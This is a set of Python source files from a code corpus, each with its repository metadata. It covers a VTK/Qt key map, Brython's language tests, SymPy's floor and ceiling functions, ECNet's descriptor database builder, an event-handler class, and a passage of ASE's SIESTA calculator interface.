Qt.Key_F4: 'F4',
Qt.Key_F5: 'F5',
Qt.Key_F6: 'F6',
Qt.Key_F7: 'F7',
Qt.Key_F8: 'F8',
Qt.Key_F9: 'F9',
Qt.Key_F10: 'F10',
Qt.Key_F11: 'F11',
Qt.Key_F12: 'F12',
Qt.Key_F13: 'F13',
Qt.Key_F14: 'F14',
Qt.Key_F15: 'F15',
Qt.Key_F16: 'F16',
Qt.Key_F17: 'F17',
Qt.Key_F18: 'F18',
Qt.Key_F19: 'F19',
Qt.Key_F20: 'F20',
Qt.Key_F21: 'F21',
Qt.Key_F22: 'F22',
Qt.Key_F23: 'F23',
Qt.Key_F24: 'F24',
Qt.Key_NumLock: 'Num_Lock',
Qt.Key_ScrollLock: 'Scroll_Lock',
}
def _qt_key_to_key_sym(key):
""" Convert a Qt key into a vtk keysym.
This is essentially copied from the c++ implementation in
GUISupport/Qt/QVTKInteractorAdapter.cxx.
"""
if key not in _keysyms:
return None
return _keysyms[key]
|
zibneuro/brainvispy
|
gui/vtkqgl.py
|
Python
|
bsd-3-clause
| 18,745
|
[
"CRYSTAL",
"VTK"
] |
1e48a3e7f9c4b09f4c683eb521278d2d63e59d0ac26fe363f65ffbb48cd736eb
|
from tester import assertRaises
# numbers
assert 2 + 2 == 4
assert (50 - 5 * 6) / 4 == 5.0
assert 8 / 4 * 2 == 4.0
assert 8 / 5 == 1.6
assert 7 // 3 == 2
assert 7 // -3 == -3
assert 4 - 2 - 2 == 0
width = 20
height = 5 * 9
assert width * height == 900
x = 6
x += 7 + 8
assert x == 21
x = y = z = 0
assert x == 0
assert y == 0
assert z == 0
# hex, octal, binary literals
a = 0xaf
assert a == 175
a = 0Xaf
assert a == 175
a = 0o754
assert a == 492
a = 0O754
assert a == 492
a = 0b10100110
assert a == 166
a = 0B10100110
assert a == 166
# bitwise operators
assert ~3 == -4
x = 3
assert ~x == -4
assert ~1 & ~10 | 8 == -4
assert 2 << 16 == 131072
assert 131072 >> 16 == 2
# __neg__
assert -x == -3
y = 2.1
assert -y == -2.1
#not sure how to convert this to assert (raise)?
try:
print(n)
print("Failed.. n should be undefined, but n:", n)
except:
pass
assert 3 * 3.75 / 1.5 == 7.5
assert 7.0 / 2 == 3.5
# strings
assert 'spam eggs' == "spam eggs"
assert 'doesn\'t' == "doesn't"
assert '"Yes," he said.' == "\"Yes,\" he said."
assert '"Isn\'t," she said.' == "\"Isn't,\" she said."
hello = "This is a rather long string containing\n\
several lines of text just as you would do in C.\n\
Note that whitespace at the beginning of the line is\
significant."
assert len(hello) == 158
hello = """\
Usage: thingy [OPTIONS]
-h Display this usage message
-H hostname Hostname to connect to
"""
assert len(hello) == 136
hello1 = """This is a rather long string containing
several lines of text just as you would do in C.
Note that whitespace at the beginning of the line is
significant."""
assert len(hello1) == 159
hello = r"This is a rather long string containing\n\
several lines of text much as you would do in C."
assert len(hello) == 91
word = 'Help' + 'A'
assert word == 'HelpA'
assert word * 5 == "HelpAHelpAHelpAHelpAHelpA"
assert 'str' 'ing' == 'string'
assert 'str'.strip() + 'ing' == 'string'
assert ' str '.strip() + 'ing' == 'string'
# string methods
x = 'fooss'
assert x.replace('o', 'X', 20) == 'fXXss'
assert 'GhFF'.lower() == 'ghff'
assert x.lstrip('of') == 'ss'
x = 'aZjhkhZyuy'
assert x.find('Z') == 1
assert x.rfind('Z') == 6
assert x.rindex('Z') == 6
try:
x.rindex('K')
print("Failed.. Should have raised ValueError, instead returned %s" % x.rindex('K'))
except ValueError:
pass
assert x.split('h') == ['aZj', 'k', 'Zyuy']
assert x.split('h', 1) == ['aZj', 'khZyuy']
assert x.split('h', 2) == ['aZj', 'k', 'Zyuy']
assert x.rsplit('h') == ['aZj', 'k', 'Zyuy']
assert x.rsplit('h', 1) == ['aZjhk', 'Zyuy']
assert x.rsplit('y', 2) == ['aZjhkhZ', 'u', '']
assert x.startswith('aZ')
assert x.strip('auy') == 'ZjhkhZ'
assert x.upper() == 'AZJHKHZYUY'
# list examples
a = ['spam', 'eggs', 100, 1234]
assert a[:2] + ['bacon', 2 * 2] == ['spam', 'eggs', 'bacon', 4]
assert 3 * a[:3] + ['Boo!'] == ['spam', 'eggs', 100, 'spam', 'eggs', 100,
'spam', 'eggs', 100, 'Boo!']
assert a[:] == ['spam', 'eggs', 100, 1234]
a[2] = a[2] + 23
assert a == ['spam', 'eggs', 123, 1234]
a[0:2] = [1, 12]
assert a == [1, 12, 123, 1234]
a[0:2] = []
assert a == [123, 1234]
a[1:1] = ['bletch','xyzzy']
assert a == [123, 'bletch', 'xyzzy', 1234]
a[:0] = a
assert a == [123, 'bletch', 'xyzzy', 1234, 123, 'bletch', 'xyzzy', 1234]
a[:] = []
assert a == []
a.extend('ab')
assert a == ['a', 'b']
a.extend([1, 2, 33])
assert a == ['a', 'b', 1, 2, 33]
# lambda
g = lambda x, y=99: 2 * x + y
assert g(10, 6) == 26
assert g(10) == 119
x = [lambda x: x * 2,lambda y: y * 3]
assert x[0](5) == 10
assert x[1](10) == 30
# inline functions and classes
def foo(x):return 2 * x
assert foo(3) == 6
class foo(list): pass
class bar(foo): pass
assert str(bar()) == "[]"
i = 10
while i > 0: i -= 1
if not True:print('true!')
else:pass
assert bin(12) == '0b1100'
assert oct(12) == '0o14'
assert hex(12) == '0xc'
assert bin(-12) == '-0b1100'
assert oct(-12) == '-0o14'
assert hex(-12) == '-0xc'
# bytes
b = b'12345'
assert len(b) == 5
# enumerate
enum_obj = enumerate('abcdefghij')
enum_first = next(enum_obj)
assert isinstance(enum_first, tuple)
assert enum_first[0] == 0
enum_obj = enumerate(['first', 'second'], start=1)
enum_first = next(enum_obj)
assert enum_first[0] == 1
# filter
test_list = [0, -1, 1, 2, -2]
true_values = list(filter(None, test_list))
assert true_values == [-1, 1, 2, -2]
negative_values = list(filter(lambda x: x < 0, test_list))
assert negative_values == [-1, -2]
# dir
class FooParent():
const = 0
class Foo(FooParent):
def do_something(self):
pass
foo = Foo()
foo_contents = dir(foo)
assert 'do_something' in foo_contents
assert 'const' in foo_contents
# non-ASCII variable names
donnée = 10
машина = 9
ήλιος = 4
assert donnée + машина + ήλιος == 23
# Korean
def 안녕하세요():
return "hello"
assert 안녕하세요() == "hello"
# functions and methods
class foo:
def method(self, x):
return(x)
assert foo().method(5) == 5
a = foo.method
assert foo.method == foo.method
x = foo()
assert x.method == x.method
def m1(self, x):
return 2 * x
foo.method = m1
b = foo.method
assert a != b
assert foo().method(5) == 10
y = foo()
assert x.method != y.method
def f():
pass
def g():
pass
assert f != g
# use of "global" in functions
a = 9
def f():
global a
res = [x for x in range(a)]
a = 8
return res
assert f() == [0, 1, 2, 3, 4, 5, 6, 7, 8]
assert a == 8
# nested function scopes
def f(method, arg):
def cb(ev):
return method(ev, arg)
return cb
def g(*z):
return z
a = f(g, 5)
b = f(g, 11)
assert a(8) == (8, 5)
assert b(13) == (13, 11)
# nonlocal and global
x = 0
def f():
x = 1
res = []
def g():
global x
return x
res.append(g())
def h():
nonlocal x
return x
res.append(h())
return res
assert f() == [0, 1]
def P():
b = 1
def Q():
nonlocal b
b += 1
return b
return Q()
assert P() == 2
# use imported names : override built-in range
from a import *
res = []
for i in range(10):
res.append(i)
assert res == ['a', 'b', 'c']
# restore built-in range
range = __builtins__.range
assert list(range(2)) == [0, 1]
# __setattr__ defined in a class
class A:
def __init__(self, x):
self.x = x
def __setattr__(self, k, v):
object.__setattr__(self, k, 2 * v)
a = A(4)
assert a.x == 8
# nested scopes
def f():
x = 1
def g():
assert x == 1
def h():
assert x == 1
return x + 1
return h()
return g()
assert f() == 2
# check that name "constructor" is valid
constructor = 0
# exception attributes
try:
'a' + 2
except TypeError as exc:
pass #assert exc.args[0] == "Can't convert int to str implicitly", exc.args
# check that line is in exception info
x = []
try:
x[1]
except IndexError as exc:
assert exc.args[0] == 'list index out of range'
# vars()
class A:
def __init__(self, x):
self.x = x
assert A(5).__dict__ == {'x': 5}
assert vars(A(5)) == {'x': 5}
# @ operator (PEP 465)
class A:
def __init__(self, a, b, c, d):
self.a = a
self.b = b
self.c = c
self.d = d
def __matmul__(self, other):
return A(
self.a * other.a + self.b * other.c,
self.a * other.b + self.b * other.d,
self.c + other.a + self.d + other.c,
self.c * other.b + self.d * other.d)
def __rmatmul__(self, other):
return A(
other.a * self.a + other.b * self.c,
other.a * self.b + other.b * self.d,
other.c + self.a + other.d + self.c,
other.c * self.b + other.d * self.d)
def __str__(self):
return "({} {})\n({} {})".format(self.a, self.b,
self.c, self.d)
def __eq__(self, other):
return (self.a == other.a and
self.b == other.b and
self.c == other.c and
self.d == other.d)
a1 = A(1, 2, 3, 4)
a2 = A(2, 3, 4, 5)
a3 = A(10, 13, 13, 29)
assert a1 @ a2 == a3
a1 @= a2
assert a1 == a3
class B:
def __init__(self, a, b, c, d):
self.a = a
self.b = b
self.c = c
self.d = d
assert B(1, 2, 3, 4) @ A(2, 3, 4, 5) == a3
# sys.exc_info
import sys
try:
1 / 0
except:
exc_class, exc, tb = sys.exc_info()
assert exc_class is ZeroDivisionError
assert sys.exc_info() == (None, None, None)
try:
1 / 0
except ZeroDivisionError:
assert sys.exc_info()[0] is ZeroDivisionError
finally:
assert sys.exc_info() == (None, None, None)
# comparisons with None
msg = "'{}' not supported between instances of '{}' and 'NoneType'"
class X:
pass
for value in [0.,
0,
"a",
b"a",
(bytearray(b'ab'), "bytearray(b'ab')"),
((), "()"),
[],
({}, "{{}}"),
set(),
frozenset(),
1j,
None,
True,
False,
(SyntaxError, "SyntaxError"),
(range(2), "range(2)"),
((x for x in range(2)), "(x for x in range(2))"),
(map(len, ["a", "bc"]), 'map(len, ["a", "bc"])'),
(zip(["a", "b"], [1, 2]), 'zip(["a", "b"], [1, 2])'),
(len, "len"),
(X, "X"),
(X(), "X()")]:
if isinstance(value, tuple):
value, vrepr = value
else:
vrepr = repr(value)
s = f"{vrepr} {{}} None"
for op in [">", "<", ">=", "<="]:
try:
eval(s.format(op))
raise Exception(f"{op} should have raised TypeError")
except Exception as exc:
assert exc.args[0] == msg.format(op, type(value).__name__), \
(op, exc.args[0], msg.format(op, type(value).__name__))
if value is not None:
assert value != None
assert not (value == None)
# PEP 570 (positional-only parameters)
def pos_only_arg(arg, /):
return arg
pos_only_arg(1)
assertRaises(TypeError, pos_only_arg, arg=2)
def kwd_only_arg(*, arg):
return arg
assert kwd_only_arg(arg=2) == 2
assertRaises(TypeError, kwd_only_arg, 1)
def combined_example(pos_only, /, standard, *, kwd_only):
return pos_only, standard, kwd_only
assert combined_example(1, 2, kwd_only=3) == (1, 2, 3)
assert combined_example(1, standard=2, kwd_only=3) == (1, 2, 3)
assertRaises(TypeError, combined_example, 1, 2, 3)
# del
attr = 5
del attr
for attr in range(5):
pass
# PEP 572 (assignement expressions)
def f(x):
return x
(y := f(8))
assert y == 8
assertRaises(SyntaxError, exec, "y0 = y1 := f(5)")
y0 = (y1 := f(5))
assert y0 == 5
assert y1 == 5
assertRaises(SyntaxError, exec, "foo(x = y := f(x))")
assertRaises(SyntaxError, exec,
"""def foo(answer = p := 42):
pass""")
def foo(answer=(p := 42)):
return answer, p
assert foo() == (42, 42)
assert foo(5) == (5, 42)
assertRaises(SyntaxError, exec,
"""def foo(answer: p := 42 = 5):
pass""")
def foo1(answer: (p := 42) = 5):
return (answer, p)
assert foo1() == (5, 42)
assert foo1(8) == (8, 42)
assertRaises(SyntaxError, exec, "lambda x:= 1")
assertRaises(SyntaxError, exec, "(lambda x:= 1)")
f = lambda: (x := 1)
assert f() == 1
assert f'{(xw:=10)}' == "10"
assert xw == 10
z = 3
assert f'{z:=5}' == ' 3'
total = 0
partial_sums = [total := total + v for v in range(5)]
assert total == 10
def assign_expr_in_comp_global():
global total
[total := total + v for v in range(5)]
assign_expr_in_comp_global()
assert total == 20
def assign_expr_in_comp_nonlocal():
x = 0
def g():
nonlocal x
[ x := x + i for i in range(5)]
g()
return x
assert assign_expr_in_comp_nonlocal() == 10
# operation with unary neg
def f(x, y):
return -x[1]*y[2], -x[0]*y[2]
assert f([1, 2, 3], [4, 5, 6]) == (-12, -6)
# issue 1355
def f():
[{ # comment
0: 0} # comment
for _ in []]
# issue 1363
a = (b) = (c) = "test"
assert a == "test"
assert b == "test"
assert c == "test"
# issue 1387
x = 10
a = -7
b = a + 5 * x if a < 0 else a
assert b == 43
a = 7
b = a + 5 * x if a < 0 else a
assert b == 7
# PEP 585
import types
assert str(list[str]) == 'list[str]'
assert str(list[str, int]) == 'list[str, int]'
assert str(list[int, ...]) == 'list[int, ...]'
assert str(tuple[str]) == 'tuple[str]'
assert isinstance(list[str], types.GenericAlias)
try:
isinstance([1, 2, 3], list[str])
raise Exception("should have raised TypeError")
except TypeError:
pass
try:
issubclass(list, list[str])
raise Exception("should have raised TypeError")
except TypeError:
pass
assert list[str]([2, 'a']) == [2, 'a']
assert list[str].__origin__ is list
assert list[str].__args__ == (str,)
assert not (list is list[str])
assert list != list[str]
assert list[str] == list[str]
# issue 1535
assert [x for x in "abc" if "xyz"[0 if 1 else 2] < "z"] == ['a', 'b', 'c']
# issue 1545
assert (lambda:
# A greeting.
'hi')() == 'hi'
assert (lambda: (
# A greeting.
"hi"
))() == 'hi'
assert (lambda: (
'''
# not a comment
hi
'''
))() == "\n # not a comment\n hi\n "
assert lambda:( # A greeter.
print('hi') # Short for "Hello".
)() == 'hi'
# issue 1557
assertRaises(SyntaxError, exec, "a, b += 1")
assertRaises(SyntaxError, exec, "(a, b) += 1")
assertRaises(SyntaxError, exec, "[a, b] += 1")
assertRaises(SyntaxError, exec, "{a, b} += 1")
assertRaises(SyntaxError, exec, "{a: 0, b: 1} += 1")
assertRaises(SyntaxError, exec, "{} += 1")
# issue 1642
assertRaises(SyntaxError, exec, "(=)")
assertRaises(SyntaxError, exec, "(=0)")
assertRaises(SyntaxError, exec, '(=")')
# issue 1654
class MyClass(list):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
for index in range(len(self)):
argument = self[index]
if type(argument) == list:
argument = self.__class__(argument)
self[index] = argument
a = MyClass([1, 2, [3, 4, 5]])
assert type(a[2]) is MyClass
# issue 1693
t = []
if 1: t.append('a');t.append('b')
else: t.append('c')
assert t == ['a', 'b']
t = []
if 1: t.append('a');t.append('b');
else: t.append('c')
assert t == ['a', 'b']
lambda:{};t.append('c');
assert t[-1] == 'c'
# issue 1697
try:
for x1697.y in [0]:
pass
raise Exception('should have raised NameError')
except NameError:
pass
# issue 1718 (tabulations)
characters = {
"amber": {
'ascension': {
'element_1': 'agnidus_agate',
},
'element': 'pyro'
}
}
# issue 1721
def f():
y = g(0 <= x <= 1)
return y
def g(x):
return x
x = 0.5
assert f()
x = 2
assert not f()
# issue 1802
assertRaises(SyntaxError, exec, ".x = 4")
# issue 1803
assertRaises(SyntaxError, exec, "050")
# issue 1807
assertRaises(SyntaxError, exec, '-')
# issue 1819
assert eval("-5 - 8") == -13
assert [0 < a < 2 for a in (0, 1)] == [False, True]
# unpacking in "for" target
lists = [
[0, 1, 2, 3],
['ab', 'b', 'c']
]
groups = []
for x, *y, z in lists:
groups.append((x, y, z))
assert groups == [(0, [1, 2], 3), ('ab', ['b'], 'c')]
# various flavours of try / except / else / finally
def try_except1():
try:
return 1
except ZeroDivisionError:
return 2
assert try_except1() == 1
def try_except2():
try:
return 1 / 0
except ZeroDivisionError:
return 2
assert try_except2() == 2
def try_except_else1():
try:
return 1
except ZeroDivisionError:
return 2
else:
return 3
assert try_except_else1() == 1
def try_except_else2():
try:
return 1 / 0
except ZeroDivisionError:
return 2
else:
return 3
assert try_except_else2() == 2
def try_finally():
try:
return 1
finally:
return 4
assert try_finally() == 4
def try_except_else_finally():
try:
return 1
except ZeroDivisionError:
return 2
else:
return 3
finally:
return 4
#assert try_except_else_finally() == 4
print('passed all tests...')
|
brython-dev/brython
|
www/tests/test_suite.py
|
Python
|
bsd-3-clause
| 16,189
|
[
"Amber"
] |
dd215688d56e2f045ec9a34acc0efce27a9c2c0efa1de76f004bab5df7d15499
|
from __future__ import print_function, division
from sympy.core.basic import C
from sympy.core.singleton import S
from sympy.core.function import Function
from sympy.core import Add
from sympy.core.evalf import get_integer_part, PrecisionExhausted
###############################################################################
######################### FLOOR and CEILING FUNCTIONS #########################
###############################################################################
class RoundFunction(Function):
"""The base class for rounding functions."""
nargs = 1
@classmethod
def eval(cls, arg):
if arg.is_integer:
return arg
if arg.is_imaginary:
return cls(C.im(arg))*S.ImaginaryUnit
v = cls._eval_number(arg)
if v is not None:
return v
# Integral, numerical, symbolic part
ipart = npart = spart = S.Zero
# Extract integral (or complex integral) terms
terms = Add.make_args(arg)
for t in terms:
if t.is_integer or (t.is_imaginary and C.im(t).is_integer):
ipart += t
elif t.has(C.Symbol):
spart += t
else:
npart += t
if not (npart or spart):
return ipart
# Evaluate npart numerically if independent of spart
if npart and (
not spart or
npart.is_real and spart.is_imaginary or
npart.is_imaginary and spart.is_real):
try:
re, im = get_integer_part(
npart, cls._dir, {}, return_ints=True)
ipart += C.Integer(re) + C.Integer(im)*S.ImaginaryUnit
npart = S.Zero
except (PrecisionExhausted, NotImplementedError):
pass
spart = npart + spart
if not spart:
return ipart
elif spart.is_imaginary:
return ipart + cls(C.im(spart), evaluate=False)*S.ImaginaryUnit
else:
return ipart + cls(spart, evaluate=False)
def _eval_is_bounded(self):
return self.args[0].is_bounded
def _eval_is_real(self):
return self.args[0].is_real
def _eval_is_integer(self):
return self.args[0].is_real
class floor(RoundFunction):
"""
Floor is a univariate function which returns the largest integer
value not greater than its argument. However this implementation
generalizes floor to complex numbers.
More information can be found in "Concrete mathematics" by Graham,
pp. 87 or visit http://mathworld.wolfram.com/FloorFunction.html.
>>> from sympy import floor, E, I, Float, Rational
>>> floor(17)
17
>>> floor(Rational(23, 10))
2
>>> floor(2*E)
5
>>> floor(-Float(0.567))
-1
>>> floor(-I/2)
-I
See Also
========
ceiling
"""
_dir = -1
@classmethod
def _eval_number(cls, arg):
if arg.is_Number:
if arg.is_Rational:
return C.Integer(arg.p // arg.q)
elif arg.is_Float:
return C.Integer(int(arg.floor()))
else:
return arg
if arg.is_NumberSymbol:
return arg.approximation_interval(C.Integer)[0]
def _eval_nseries(self, x, n, logx):
r = self.subs(x, 0)
args = self.args[0]
args0 = args.subs(x, 0)
if args0 == r:
direction = (args - args0).leadterm(x)[0]
if direction.is_positive:
return r
else:
return r - 1
else:
return r
class ceiling(RoundFunction):
"""
Ceiling is a univariate function which returns the smallest integer
value not less than its argument. Ceiling function is generalized
in this implementation to complex numbers.
More information can be found in "Concrete mathematics" by Graham,
pp. 87 or visit http://mathworld.wolfram.com/CeilingFunction.html.
>>> from sympy import ceiling, E, I, Float, Rational
>>> ceiling(17)
17
>>> ceiling(Rational(23, 10))
3
>>> ceiling(2*E)
6
>>> ceiling(-Float(0.567))
0
>>> ceiling(I/2)
I
See Also
========
floor
"""
_dir = 1
@classmethod
def _eval_number(cls, arg):
if arg.is_Number:
if arg.is_Rational:
return -C.Integer(-arg.p // arg.q)
elif arg.is_Float:
return C.Integer(int(arg.ceiling()))
else:
return arg
if arg.is_NumberSymbol:
return arg.approximation_interval(C.Integer)[1]
def _eval_nseries(self, x, n, logx):
r = self.subs(x, 0)
args = self.args[0]
args0 = args.subs(x, 0)
if args0 == r:
direction = (args - args0).leadterm(x)[0]
if direction.is_positive:
return r + 1
else:
return r
else:
return r
|
hrashk/sympy
|
sympy/functions/elementary/integers.py
|
Python
|
bsd-3-clause
| 5,111
|
[
"VisIt"
] |
62ea27e1004d99285812ee9984394ead8ef45ec86ebff91fea880bae8e4b01f3
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# ecnet/tools/database.py
# v.3.3.2
# Developed in 2020 by Travis Kessler <travis.j.kessler@gmail.com>
#
# Contains functions for creating ECNet-formatted databases
#
# Stdlib imports
from csv import writer
from datetime import datetime
from os import remove
from warnings import warn
# 3rd party imports
from alvadescpy import smiles_to_descriptors
from padelpy import from_mdl, from_smiles
try:
import pybel
except ImportError:
pybel = None
class _Molecule:
def __init__(self, id):
self.id = id
self.assignment = 'L'
self.strings = {'Compound Name': ''}
self.target = 0
self.inputs = None
def create_db(smiles: list, db_name: str, targets: list = None,
id_prefix: str = '', extra_strings: dict = {},
backend: str = 'padel', convert_mdl: bool = False):
''' create_db: creates an ECNet-formatted database from SMILES strings
using either PaDEL-Descriptor or alvaDesc software; using alvaDesc
requires a valid installation/license of alvaDesc
Args:
smiles (list): list of SMILES strings
db_name (str): name/path of database being created
targets (list): target (experimental) values, align with SMILES
strings; if None, all TARGETs set to 0
id_prefix (str): prefix of molecule DATAID, if desired
extra_strings (dict): extra STRING columns, label = name, value = list
with length equal to number of SMILES strings
backend (str): software used to calculate QSPR descriptors, 'padel' or
'alvadesc'
convert_mdl (bool): if `True`, converts SMILES strings to MDL 3D
format before calculating descriptors (PaDEL only)
'''
if targets is not None:
if len(targets) != len(smiles):
raise ValueError('Must supply same number of targets as SMILES '
'strings: {}, {}'.format(
len(targets), len(smiles)
))
for string in list(extra_strings.keys()):
if len(extra_strings[string]) != len(smiles):
raise ValueError('Extra string values for {} not equal in length '
'to supplied SMILES: {}, {}'.format(
len(extra_strings[string]), len(smiles)
))
mols = []
if backend == 'alvadesc':
for mol in smiles:
mols.append(smiles_to_descriptors(mol))
elif backend == 'padel':
for idx, mol in enumerate(smiles):
if convert_mdl is True:
if pybel is None:
raise ImportError(
'pybel (Python Open Babel wrapper) not installed, '
'cannot convert SMILES to MDL'
)
mdl = pybel.readstring('smi', mol)
mdl.make3D()
curr_time = datetime.now().strftime('%Y%m%d%H%M%S%f')[:-3]
mdl.write('mdl', '{}.mdl'.format(curr_time))
try:
mols.append(from_mdl('{}.mdl'.format(curr_time))[0])
except RuntimeError:
warn('Could not calculate descriptors for {}, omitting'
.format(mol), RuntimeWarning)
del smiles[idx]
if targets is not None:
del targets[idx]
for string in list(extra_strings.keys()):
del extra_strings[string][idx]
remove('{}.mdl'.format(curr_time))
else:
try:
mols.append(from_smiles(mol))
except RuntimeError:
warn('Could not calculate descriptors for {}, omitting'
.format(mol), RuntimeWarning)
del smiles[idx]
if targets is not None:
del targets[idx]
for string in list(extra_strings.keys()):
del extra_strings[string][idx]
else:
raise ValueError('Unknown backend software: {}'.format(backend))
rows = []
type_row = ['DATAID', 'ASSIGNMENT', 'STRING', 'STRING']
title_row = ['DATAID', 'ASSIGNMENT', 'Compound Name', 'SMILES']
strings = list(extra_strings.keys())
for string in strings:
if string != 'Compound Name':
type_row.append('STRING')
title_row.append(string)
type_row.append('TARGET')
title_row.append('TARGET')
descriptor_keys = list(mols[0].keys())
for key in descriptor_keys:
type_row.append('INPUT')
title_row.append(key)
mol_rows = []
for idx, desc in enumerate(mols):
for key in descriptor_keys:
if desc[key] == 'na' or desc[key] == '':
desc[key] = 0
mol = _Molecule('{}'.format(id_prefix) + '%04d' % (idx + 1))
for string in strings:
mol.strings[string] = extra_strings[string][idx]
if targets is not None:
mol.target = targets[idx]
mol.inputs = desc
mol_rows.append(mol)
with open(db_name, 'w', encoding='utf-8') as db_file:
wr = writer(db_file, delimiter=',', lineterminator='\n')
wr.writerow(type_row)
wr.writerow(title_row)
for idx, mol in enumerate(mol_rows):
row = [mol.id, mol.assignment, mol.strings['Compound Name'],
smiles[idx]]
for string in strings:
if string != 'Compound Name':
row.append(mol.strings[string])
row.append(mol.target)
for key in descriptor_keys:
row.append(mol.inputs[key])
wr.writerow(row)
db_file.close()
|
TJKessler/ECNet
|
ecnet/tools/database.py
|
Python
|
mit
| 5,843
|
[
"Open Babel",
"Pybel"
] |
5b14042181c4ef7ba4c6cae7deeb11d5f78b3ef37b5a16d53172522641398441
|
# -*- coding: utf8 -*-
from .exceptions import StopPropagation
from .event import Event
from ..typing import AbstractHandler, Modifiers
always_true = lambda event: True
class HandlerModifiers(Modifiers):
def refuse(self, visited, visitor):
"""if not a visitor, it is a callback"""
visited.append(visitor)
def reject(self, visited, visitor):
self.remove(visitor)
class Handler(AbstractHandler):
event_type = Event
def __init__(self, *callbacks, **options):
self.visitors = HandlerModifiers(callbacks)
self.events = tuple()
for item, value in tuple(options.items()):
setattr(self, item, value)
self.visitors.visit(self)
@property
def condition(self):
return getattr(self, '_condition', always_true)
@condition.setter
def condition(self, condition):
self._assert_valid(condition)
self._condition = condition
@condition.deleter
def condition(self):
delattr(self, '_condition')
def notify(self, *args, **kwargs):
event = self.make_event(*args, **kwargs)
return self.propagate(event)
def make_event(self, *args, **kwargs):
return self.event_type(*args, **kwargs)
def __call__(self, event):
return self.propagate(event).returns()
def propagate(self, event):
self.events += (event, )
try:
self.before_propagation(event)
self._assert_condition(event)
tuple(map(event.trigger, self))
self.after_propagation(event)
except StopPropagation:
pass
return event
def before_propagation(self, event):
pass
def after_propagation(self, event):
pass
def _assert_condition(self, event):
if not self.condition(event):
msg = "Condition '%s' for event '%s' return False"
event.stop_propagation(msg % (id(self.condition), type(event).__name__))
def when(self, condition):
cond = type(self)(condition=condition)
try:
index = self.index(cond)
except ValueError:
index = len(self)
self.append(cond)
return self[index]
def append(self, callback):
self._assert_valid(callback)
list.append(self, callback)
return self
def prepend(self, callbacks):
currents = list(self)
self.empty()
self.extend(callbacks)
list.extend(self, currents)
return self
def insert(self, key, callback):
self._assert_valid(callback)
return list.insert(self, key, callback)
def extend(self, callbacks):
self._assert_list_valid(callbacks)
return list.extend(self, callbacks)
def update(self, other):
self.extend(other)
self.condition = getattr(other, 'condition', self.condition)
self.visitors.extend(self, getattr(other, 'visitors', []))
return self
def clear_events(self):
self.events = tuple()
def empty(self):
del self[0:]
def clear(self):
self.clear_events()
self.empty()
def _assert_list_valid(self, callbacks):
tuple(map(self._assert_valid, callbacks))
def _assert_valid(self, callback):
if not callable(callback):
raise TypeError('"%s": is not callable' % callback)
def __iadd__(self, callback):
self.append(callback)
return self
def __isub__(self, callback):
while callback in self:
self.remove(callback)
return self
def __repr__(self):
return "%s: %s" % (type(self).__name__, list(self).__repr__())
def __eq__(self, handler):
return getattr(self, 'condition', None) == getattr(handler, 'condition', None)
def __setitem__(self, key, callback):
self._assert_valid(callback)
return list.__setitem__(self, key, callback)
do = then = append
|
apieum/eventize
|
eventize/events/handler.py
|
Python
|
lgpl-3.0
| 3,963
|
[
"VisIt"
] |
ec0f32def237444d0698d3ee127740f0966b6767ec80ce9b482b2738dd9d88d0
|
"""This module defines an ASE interface to SIESTA.
http://www.uam.es/departamentos/ciencias/fismateriac/siesta
"""
import os
from os.path import join, isfile, islink
import numpy as np
from ase.data import chemical_symbols
class Siesta:
"""Class for doing SIESTA calculations.
The default parameters are very close to those that the SIESTA
Fortran code would use. These are the exceptions::
calc = Siesta(label='siesta', xc='LDA', pulay=5, mix=0.1)
Use the set_fdf method to set extra FDF parameters::
calc.set_fdf('PAO.EnergyShift', 0.01 * Rydberg)
"""
def __init__(self, label='siesta', xc='LDA', kpts=None, nbands=None,
width=None, meshcutoff=None, charge=None,
pulay=5, mix=0.1, maxiter=120,
basis=None, ghosts=[],
write_fdf=True):
"""Construct SIESTA-calculator object.
Parameters
==========
label: str
Prefix to use for filenames (label.fdf, label.txt, ...).
Default is 'siesta'.
xc: str
Exchange-correlation functional. Must be one of LDA, PBE,
revPBE, RPBE.
kpts: list of three int
Monkhost-Pack sampling.
nbands: int
Number of bands.
width: float
Fermi-distribution width in eV.
meshcutoff: float
Cutoff energy in eV for grid.
charge: float
Total charge of the system.
pulay: int
Number of old densities to use for Pulay mixing.
mix: float
Mixing parameter between zero and one for density mixing.
write_fdf: bool
Use write_fdf=False to use your own fdf-file.
Examples
========
Use default values:
>>> h = Atoms('H', calculator=Siesta())
>>> h.center(vacuum=3.0)
>>> e = h.get_potential_energy()
"""
self.label = label#################### != out
self.xc = xc
self.kpts = kpts
self.nbands = nbands
self.width = width
self.meshcutoff = meshcutoff
self.charge = charge
self.pulay = pulay
self.mix = mix
self.maxiter = maxiter
self.basis = basis
self.ghosts = ghosts
self.write_fdf_file = write_fdf
self.converged = False
self.fdf = {}
def update(self, atoms):
if (not self.converged or
len(self.numbers) != len(atoms) or
(self.numbers != atoms.get_atomic_numbers()).any()):
self.initialize(atoms)
self.calculate(atoms)
elif ((self.positions != atoms.get_positions()).any() or
(self.pbc != atoms.get_pbc()).any() or
(self.cell != atoms.get_cell()).any()):
self.calculate(atoms)
def initialize(self, atoms):
self.numbers = atoms.get_atomic_numbers().copy()
self.species = []
for a, Z in enumerate(self.numbers):
if a in self.ghosts:
Z = -Z
if Z not in self.species:
self.species.append(Z)
if 'SIESTA_PP_PATH' in os.environ:
pppaths = os.environ['SIESTA_PP_PATH'].split(':')
else:
pppaths = []
for Z in self.species:
symbol = chemical_symbols[abs(Z)]
name = symbol + '.vps'
name1 = symbol + '.psf'
found = False
for path in pppaths:
filename = join(path, name)
filename1 = join(path,name1)
if isfile(filename) or islink(filename):
found = True
if path != '.':
if islink(name) or isfile(name):
os.remove(name)
os.symlink(filename, name)
elif isfile(filename1) or islink(filename1):
found = True
if path != '.':
if islink(name1) or isfile(name1):
os.remove(name1)
os.symlink(filename1, name1)
if not found:
raise RuntimeError('No pseudopotential for %s!' % symbol)
self.converged = False
def get_potential_energy(self, atoms, force_consistent=False):
self.update(atoms)
if force_consistent:
return self.efree
else:
# Energy extrapolated to zero Kelvin:
return (self.etotal + self.efree) / 2
def get_forces(self, atoms):
self.update(atoms)
return self.forces.copy()
def get_stress(self, atoms):
self.update(atoms)
return self.stress.copy()
def calculate(self, atoms):
self.positions = atoms.get_positions().copy()
self.cell = atoms.get_cell().copy()
self.pbc = atoms.get_pbc().copy()
if self.write_fdf_file:
self.write_fdf(atoms)
siesta = os.environ['SIESTA_SCRIPT']
